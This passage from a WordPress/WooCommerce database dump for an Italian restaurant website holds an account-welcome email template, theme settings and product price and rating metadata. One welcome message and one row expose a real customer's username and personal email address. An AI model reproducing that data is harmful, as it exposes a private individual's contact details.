<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi franzoni.elena,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>franzoni.elena</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(41482,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41483,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41484,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41485,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41486,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41487,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41488,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41489,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41490,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41491,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41492,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41493,1685,'slide_template','default'),(41494,1685,'mkdf_page_content_behind_header_meta','no'),(41495,1685,'mkdf_video_type_meta','social_networks'),(41496,1685,'mkdf_audio_type_meta','self'),(41497,1685,'mkdf_disable_vertical_header_background_image_meta','no'),(41498,1685,'mkdf_disable_header_widget_areas_meta','no'),(41499,1685,'mkdf_show_title_area_meta','yes'),(41500,1685,'mkdf_title_area_type_meta','attika'),(41501,1685,'_mkdf-like','0'),(41503,1685,'_wpb_vc_js_status','true'),(41504,1685,'mkdf_page_content_padding','120px 0 0'),(41505,1685,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(41506,1685,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(41507,1685,'_dp_original','1681'),(41508,1685,'mkdf_post_gallery_images_meta','1702,1703'),(44556,3972,'to_header','franzoni.elena@gmail.com'),(41511,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41512,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41513,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41514,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41515,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41516,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41517,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41518,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41519,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41520,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41521,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41522,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41523,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41524,1688,'slide_template','default'),(41525,1688,'mkdf_page_content_behind_header_meta','no'),(41526,1688,'mkdf_video_type_meta','social_networks'),(41527,1688,'mkdf_audio_type_meta','self'),(41528,1688,'mkdf_disable_vertical_header_background_image_meta','no'),(41529,1688,'mkdf_disable_header_widget_areas_meta','no'),(41530,1688,'mkdf_show_title_area_meta','yes'),(41531,1688,'mkdf_title_area_type_meta','attika'),(41532,1688,'_mkdf-like','0'),(41534,1688,'_wpb_vc_js_status','true'),(41535,1688,'mkdf_page_content_padding','120px 0 0'),(41536,1688,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(41537,1688,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(41538,1688,'_dp_original','1685'),(41541,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41542,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41543,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41544,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41545,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41546,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41547,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41548,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41549,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41550,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41551,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41552,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41553,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41554,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41555,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41556,1693,'slide_template','default'),(41557,1693,'mkdf_page_content_behind_header_meta','no'),(41558,1693,'mkdf_video_type_meta','social_networks'),(41559,1693,'mkdf_audio_type_meta','self'),(41560,1693,'mkdf_disable_vertical_header_background_image_meta','no'),(41561,1693,'mkdf_disable_header_widget_areas_meta','no'),(41562,1693,'mkdf_show_title_area_meta','yes'),(41563,1693,'mkdf_title_area_type_meta','attika'),(41564,1693,'_mkdf-like','0'),(52202,4365,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(41566,1693,'_wpb_vc_js_status','true'),(41567,1693,'mkdf_page_content_padding','120px 0 0'),(41568,1693,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(41569,1693,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(41570,1693,'_dp_original','1688'),(41571,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41572,3115,'_sku','PR0026'),(41573,3115,'_regular_price','86'),(41574,3115,'_sale_price',''),(41575,3115,'_sale_price_dates_from',''),(41576,3115,'_sale_price_dates_to',''),(41577,3115,'total_sales','0'),(41578,3115,'_tax_status','taxable'),(41579,3115,'_tax_class',''),(41580,3115,'_manage_stock','no'),(41581,3115,'_backorders','no'),(41582,3115,'_sold_individually','no'),(41583,3115,'_weight','310'),(41584,3115,'_length',''),(41585,3115,'_width',''),(41586,3115,'_height',''),(41587,3115,'_upsell_ids','a:0:{}'),(41588,3115,'_crosssell_ids','a:0:{}'),(41589,3115,'_purchase_note',''),(41590,3115,'_default_attributes','a:0:{}'),(41591,3115,'_virtual','no'),(41592,3115,'_downloadable','no'),(41593,3115,'_product_image_gallery',''),(41594,3115,'_download_limit','-1'),(41595,3115,'_download_expiry','-1'),(41596,3115,'_stock',''),(41597,3115,'_stock_status','instock'),(41598,3115,'_wc_average_rating','3.00'),(41599,3115,'_wc_rating_count','a:1:{i:3;i:1;}'),(41600,3115,'_wc_review_count','1'),(41601,3115,'_downloadable_files','a:0:{}'),(41602,3115,'_product_attributes','a:0:{}'),(41603,3115,'_product_version','3.4.3'),(41604,3115,'_price','86'),(41605,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41606,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41607,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41608,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41609,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41610,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41611,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41612,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41613,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41614,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41615,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41616,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41617,3115,'mkdf_show_new_sign_woo_meta','no'),(41618,3115,'slide_template','default'),(41619,3115,'_wpb_vc_js_status','false'),(41620,3115,'_thumbnail_id','467'),(41621,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41622,3116,'_sku','PR0027'),(41623,3116,'_regular_price','25'),(41624,3116,'_sale_price',''),(41625,3116,'_sale_price_dates_from',''),(41626,3116,'_sale_price_dates_to',''),(41627,3116,'total_sales','0'),(41628,3116,'_tax_status','taxable'),(41629,3116,'_tax_class',''),(41630,3116,'_manage_stock','no'),(41631,3116,'_backorders','no'),(41632,3116,'_sold_individually','no'),(41633,3116,'_weight','250'),(41634,3116,'_length',''),(41635,3116,'_width',''),(41636,3116,'_height',''),(41637,3116,'_upsell_ids','a:0:{}'),(41638,3116,'_crosssell_ids','a:0:{}'),(41639,3116,'_purchase_note',''),(41640,3116,'_default_attributes','a:0:{}'),(41641,3116,'_virtual','no'),(41642,3116,'_downloadable','no'),(41643,3116,'_product_image_gallery',''),(41644,3116,'_download_limit','-1'),(41645,3116,'_download_expiry','-1'),(41646,3116,'_stock',''),(41647,3116,'_stock_status','instock'),(41648,3116,'_wc_average_rating','4.00'),(41649,3116,'_wc_rating_count','a:1:{i:4;i:1;}'),(41650,3116,'_wc_review_count','1'),(41651,3116,'_downloadable_files','a:0:{}'),(41652,3116,'_product_attributes','a:0:{}'),(41653,3116,'_product_version','3.4.3'),(41654,3116,'_price','25'),(41655,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41656,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41657,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41658,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41659,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41660,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41661,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41662,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41663,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41664,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41665,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41666,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41667,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41668,3116,'mkdf_show_new_sign_woo_meta','no'),(41669,3116,'slide_template','default'),(41670,3116,'_wpb_vc_js_status','false'),(41672,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41673,3117,'_sku','PR0028'),(41674,3117,'_regular_price','89'),(41675,3117,'_sale_price',''),(41676,3117,'_sale_price_dates_from',''),(41677,3117,'_sale_price_dates_to',''),(41678,3117,'total_sales','0'),(41679,3117,'_tax_status','taxable'),(41680,3117,'_tax_class',''),(41681,3117,'_manage_stock','no'),(41682,3117,'_backorders','no'),(41683,3117,'_sold_individually','no'),(41684,3117,'_weight','310'),(41685,3117,'_length',''),(41686,3117,'_width',''),(41687,3117,'_height',''),(41688,3117,'_upsell_ids','a:0:{}'),(41689,3117,'_crosssell_ids','a:0:{}'),(41690,3117,'_purchase_note',''),(41691,3117,'_default_attributes','a:0:{}'),(41692,3117,'_virtual','no'),(41693,3117,'_downloadable','no'),(41694,3117,'_product_image_gallery',''),(41695,3117,'_download_limit','-1'),(41696,3117,'_download_expiry','-1'),(41697,3117,'_thumbnail_id','280'),(41698,3117,'_stock',''),(41699,3117,'_stock_status','instock'),(41700,3117,'_wc_average_rating','5.00'),(41701,3117,'_wc_rating_count','a:1:{i:5;i:1;}'),(41702,3117,'_wc_review_count','1'),(41703,3117,'_downloadable_files','a:0:{}'),(41704,3117,'_product_attributes','a:0:{}'),(41705,3117,'_product_version','3.4.3'),(41706,3117,'_price','89'),(41707,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41708,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41709,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41710,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41711,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41712,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41713,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41714,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41715,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41716,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41717,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41718,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41719,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41720,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41721,3117,'mkdf_show_new_sign_woo_meta','no'),(41722,3117,'slide_template','default'),(41723,3117,'_wpb_vc_js_status','false'),(41724,3117,'_wp_old_slug','cream-broccoli-soup'),(41725,3117,'_wp_old_slug','broccoli-soup'),(41726,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41727,3118,'_sku','PR0030'),(41728,3118,'_regular_price','58'),(41729,3118,'_sale_price',''),(41730,3118,'_sale_price_dates_from',''),(41731,3118,'_sale_price_dates_to',''),(41732,3118,'total_sales','0'),(41733,3118,'_tax_status','taxable'),(41734,3118,'_tax_class',''),(41735,3118,'_manage_stock','no'),(41736,3118,'_backorders','no'),(41737,3118,'_sold_individually','no'),(41738,3118,'_weight','310'),(41739,3118,'_length',''),(41740,3118,'_width',''),(41741,3118,'_height',''),(41742,3118,'_upsell_ids','a:0:{}'),(41743,3118,'_crosssell_ids','a:0:{}'),(41744,3118,'_purchase_note',''),(41745,3118,'_default_attributes','a:0:{}'),(41746,3118,'_virtual','no'),(41747,3118,'_downloadable','no'),(41748,3118,'_product_image_gallery',''),(41749,3118,'_download_limit','-1'),(41750,3118,'_download_expiry','-1'),(41751,3118,'_thumbnail_id','273'),(41752,3118,'_stock',''),(41753,3118,'_stock_status','instock'),(41754,3118,'_wc_average_rating','5.00'),(41755,3118,'_wc_rating_count','a:1:{i:5;i:1;}'),(41756,3118,'_wc_review_count','1'),(41757,3118,'_downloadable_files','a:0:{}'),(41758,3118,'_product_attributes','a:0:{}'),(41759,3118,'_product_version','3.4.3'),(41760,3118,'_price','58'),(41761,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41762,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41763,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41764,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41765,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41766,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41767,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41768,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41769,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41770,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41771,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41772,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41773,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41774,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41775,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41776,3118,'mkdf_show_new_sign_woo_meta','no'),(41777,3118,'slide_template','default'),(41778,3118,'_wpb_vc_js_status','false'),(41779,3118,'_wp_old_slug','sea-weed-risotto'),(41780,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41781,3119,'_sku','PR0029'),(41782,3119,'_regular_price','95'),(41783,3119,'_sale_price',''),(41784,3119,'_sale_price_dates_from',''),(41785,3119,'_sale_price_dates_to',''),(41786,3119,'total_sales','0'),(41787,3119,'_tax_status','taxable'),(41788,3119,'_tax_class',''),(41789,3119,'_manage_stock','no'),(41790,3119,'_backorders','no'),(41791,3119,'_sold_individually','no'),(41792,3119,'_weight','100'),(41793,3119,'_length',''),(41794,3119,'_width',''),(41795,3119,'_height',''),(41796,3119,'_upsell_ids','a:0:{}'),(41797,3119,'_crosssell_ids','a:0:{}'),(41798,3119,'_purchase_note',''),(41799,3119,'_default_attributes','a:0:{}'),(41800,3119,'_virtual','no'),(41801,3119,'_downloadable','no'),(41802,3119,'_product_image_gallery',''),(41803,3119,'_download_limit','-1'),(41804,3119,'_download_expiry','-1'),(41805,3119,'_thumbnail_id','278'),(41806,3119,'_stock',''),(41807,3119,'_stock_status','instock'),(41808,3119,'_wc_average_rating','4.00'),(41809,3119,'_wc_rating_count','a:1:{i:4;i:1;}'),(41810,3119,'_wc_review_count','1'),(41811,3119,'_downloadable_files','a:0:{}'),(41812,3119,'_product_attributes','a:0:{}'),(41813,3119,'_product_version','3.4.3'),(41814,3119,'_price','95'),(41815,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41816,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41817,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41818,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41819,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41820,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41821,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41822,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41823,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41824,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41825,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41826,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41827,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41828,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41829,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41830,3119,'mkdf_show_new_sign_woo_meta','no'),(41831,3119,'slide_template','default'),(41832,3119,'_wpb_vc_js_status','false'),(41833,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41834,3120,'_sku','PR0031'),(41835,3120,'_regular_price','86'),(41836,3120,'_sale_price',''),(41837,3120,'_sale_price_dates_from',''),(41838,3120,'_sale_price_dates_to',''),(41839,3120,'total_sales','0'),(41840,3120,'_tax_status','taxable'),(41841,3120,'_tax_class',''),(41842,3120,'_manage_stock','no'),(41843,3120,'_backorders','no'),(41844,3120,'_sold_individually','no'),(41845,3120,'_weight','100'),(41846,3120,'_length',''),(41847,3120,'_width',''),(41848,3120,'_height',''),(41849,3120,'_upsell_ids','a:0:{}'),(41850,3120,'_crosssell_ids','a:0:{}'),(41851,3120,'_purchase_note',''),(41852,3120,'_default_attributes','a:0:{}'),(41853,3120,'_virtual','no'),(41854,3120,'_downloadable','no'),(41855,3120,'_product_image_gallery',''),(41856,3120,'_download_limit','-1'),(41857,3120,'_download_expiry','-1'),(41858,3120,'_thumbnail_id','274'),(41859,3120,'_stock',''),(41860,3120,'_stock_status','instock'),(41861,3120,'_wc_average_rating','5.00'),(41862,3120,'_wc_rating_count','a:1:{i:5;i:1;}'),(41863,3120,'_wc_review_count','1'),(41864,3120,'_downloadable_files','a:0:{}'),(41865,3120,'_product_attributes','a:0:{}'),(41866,3120,'_product_version','3.4.3'),(41867,3120,'_price','86'),(41868,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41869,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41870,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41871,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41872,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41873,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41874,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41875,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41876,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41877,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41878,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41879,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41880,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41881,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41882,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41883,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41884,3120,'mkdf_show_new_sign_woo_meta','yes'),(41885,3120,'slide_template','default'),(41886,3120,'_wpb_vc_js_status','false'),(41887,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41888,3121,'_sku','PR0032'),(41889,3121,'_regular_price','86'),(41890,3121,'_sale_price',''),(41891,3121,'_sale_price_dates_from',''),(41892,3121,'_sale_price_dates_to',''),(41893,3121,'total_sales','0'),(41894,3121,'_tax_status','taxable'),(41895,3121,'_tax_class',''),(41896,3121,'_manage_stock','no'),(41897,3121,'_backorders','no'),(41898,3121,'_sold_individually','no'),(41899,3121,'_weight','100'),(41900,3121,'_length',''),(41901,3121,'_width',''),(41902,3121,'_height',''),(41903,3121,'_upsell_ids','a:0:{}'),(41904,3121,'_crosssell_ids','a:0:{}'),(41905,3121,'_purchase_note',''),(41906,3121,'_default_attributes','a:0:{}'),(41907,3121,'_virtual','no'),(41908,3121,'_downloadable','no'),(41909,3121,'_product_image_gallery',''),(41910,3121,'_download_limit','-1'),(41911,3121,'_download_expiry','-1'),(41912,3121,'_thumbnail_id','277'),(41913,3121,'_stock',''),(41914,3121,'_stock_status','instock'),(41915,3121,'_wc_average_rating','4.00'),(41916,3121,'_wc_rating_count','a:1:{i:4;i:1;}'),(41917,3121,'_wc_review_count','1'),(41918,3121,'_downloadable_files','a:0:{}'),(41919,3121,'_product_attributes','a:0:{}'),(41920,3121,'_product_version','3.4.3'),(41921,3121,'_price','86'),(41922,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41923,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41924,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41925,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41926,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41927,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41928,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41929,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41930,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41931,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41932,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41933,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41934,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41935,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41936,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41937,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41938,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41939,3121,'mkdf_show_new_sign_woo_meta','no'),(41940,3121,'slide_template','default'),(41941,3121,'_wpb_vc_js_status','false'),(41942,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41943,3122,'_sku','PR0033'),(41944,3122,'_regular_price','86'),(41945,3122,'_sale_price',''),(41946,3122,'_sale_price_dates_from',''),(41947,3122,'_sale_price_dates_to',''),(41948,3122,'total_sales','0'),(41949,3122,'_tax_status','taxable'),(41950,3122,'_tax_class',''),(41951,3122,'_manage_stock','no'),(41952,3122,'_backorders','no'),(41953,3122,'_sold_individually','no'),(41954,3122,'_weight','100'),(41955,3122,'_length',''),(41956,3122,'_width',''),(41957,3122,'_height',''),(41958,3122,'_upsell_ids','a:0:{}'),(41959,3122,'_crosssell_ids','a:0:{}'),(41960,3122,'_purchase_note',''),(41961,3122,'_default_attributes','a:0:{}'),(41962,3122,'_virtual','no'),(41963,3122,'_downloadable','no'),(41964,3122,'_product_image_gallery',''),(41965,3122,'_download_limit','-1'),(41966,3122,'_download_expiry','-1'),(41967,3122,'_thumbnail_id','517'),(41968,3122,'_stock',''),(41969,3122,'_stock_status','instock'),(41970,3122,'_wc_average_rating','4.00'),(41971,3122,'_wc_rating_count','a:1:{i:4;i:1;}'),(41972,3122,'_wc_review_count','1'),(41973,3122,'_downloadable_files','a:0:{}'),(41974,3122,'_product_attributes','a:0:{}'),(41975,3122,'_product_version','3.4.3'),(41976,3122,'_price','86'),(41977,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41978,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41979,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41980,3122,'_vc_post_settin